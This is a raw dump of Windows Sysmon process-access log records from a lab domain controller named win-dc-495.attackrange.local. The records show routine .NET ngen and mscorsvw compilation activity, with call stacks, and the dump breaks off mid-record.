13:46:29.531{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9135-6005-0902-00000000A301}2484C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006202Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:29.484{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9135-6005-0802-00000000A301}5108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006201Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:29.468{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9135-6005-0802-00000000A301}5108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006200Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:29.468{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9135-6005-0802-00000000A301}5108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006199Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:29.406{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9135-6005-0702-00000000A301}2956C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006198Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:29.390{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9135-6005-0702-00000000A301}2956C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006197Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:29.390{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9135-6005-0702-00000000A301}2956C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006196Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:29.328{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9135-6005-0602-00000000A301}4100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006195Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:29.328{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9135-6005-0602-00000000A301}4100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006194Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:29.328{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9135-6005-0602-00000000A301}4100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006193Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:29.281{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9135-6005-0502-00000000A301}4892C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006192Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:29.265{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9135-6005-0502-00000000A301}4892C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006191Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:29.265{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9135-6005-0502-00000000A301}4892C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006190Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:29.218{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9135-6005-0402-00000000A301}728C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006189Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:29.203{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9135-6005-0402-00000000A301}728C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006188Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:29.203{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9135-6005-0402-00000000A301}728C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006187Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:29.171{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9135-6005-0302-00000000A301}220C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006186Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:29.156{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9135-6005-0302-00000000A301}220C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006185Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:29.156{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9135-6005-0302-00000000A301}220C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006184Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:29.109{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9135-6005-0202-00000000A301}3220C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006183Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:29.109{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9135-6005-0202-00000000A301}3220C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006182Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:29.093{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9135-6005-0202-00000000A301}3220C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006181Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:29.046{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9135-6005-0102-00000000A301}3732C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\nt